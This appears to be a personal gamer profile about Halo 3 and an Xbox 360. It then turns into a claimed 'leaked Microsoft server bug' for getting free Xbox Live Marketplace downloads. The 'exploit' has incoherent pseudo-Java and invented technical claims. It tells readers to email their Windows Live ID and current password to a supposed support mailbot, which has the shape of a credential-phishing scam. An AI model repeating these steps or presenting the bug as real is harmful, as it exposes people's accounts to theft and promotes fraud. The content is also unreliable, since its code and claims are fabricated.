Oh well here I am. There's not much tell, call my self JayHallenz here though my nickname usually is Hallenz in games and on website and such. There was some guy who already had Hallenz so I couldn't use that name. T________T
But well, I like to play games and play guitar. My favorite game is Halo 3 I think but I play many other games too. I like buy games and then when I get tired of them I go back to playing Halo 3 again.
I have been trying to do some Garry's Mod videos but they sucked because my computer kinda sucks so it lagged and stuff.
I own a Wii and a Xbox 360, I mostly play Xbox though cuz I think Wii is pretty boring. It's just my lil' sis who plays it.. My gamertag on Ecksbawks is Hallenz ofc.

Due to my recent termination from Microsoft, I have decided to share a little bug on the server side that I never reported. Here's how it works: The same server is used to handle password change requests and marketplace transactions to save money and space. Someone requesting a changed password and purchasing something roughly within a 10 minute window was never planned for. Heres how the code works: try { if (request.getAttribute("trans") == trans) { Context ctx = (Context) new InitialContext().lookup("acc.login:console/env"); autoMailer.sendOut(pass); } else { trans.begin(); } ConsoleManager cm = (ConsoleManager) ctx.lookupSessionManager(); cm.process(pass); catch (TransactionException fa273) { trans.commit(); fa273.printErrToServer(); cm.close(); }
As you can see it can't handle both at once, therefore throwing a TransactionException, which contains the code trans.commit(); This code finalizes the transaction and whatever you were trying to download should be available to you.. regardless of how many microsoft points you had. It also allows you to download anything you like from the marketplace without removing the actual amount of points it costs from your account. WARNING: You must have a Gold Account to do this, and it is best to have at least 800 points in your account, because the server may still recognize whether or not you have points, but simply will not take them from your account. Without ANY points, it will still work, but may take a couple tries.
Send the password change mailbot (no.reply.support@live.com) the following message. This will try to do both at once.. resulting in the server committing to the transaction: email subject: passChange, email body:
processRequest.changePass(newPass="Desired New Password"%20oldPass="Current Password"%20oldPassVerify="Current Password Again").getSessionName("Windows Live ID"))
NOTE: This is also a way to change your pass while not on your xbox, since the same message is generated and sent here by the form on your console anyways. That should work.. if you have any problems be sure to double check spelling and that you copied the methods used exactly. After sending this email, like I said before, you will have about a 45 minute to 1 hour window that will allow you to download anything you like for no points. You can also change your password back to what it was immediately after you download any items, but you cannot have your new password the same as your old password, it will reject it immediately and leave no window. This DOES NOT add points to your account. Stick it to the man! Enjoy :)
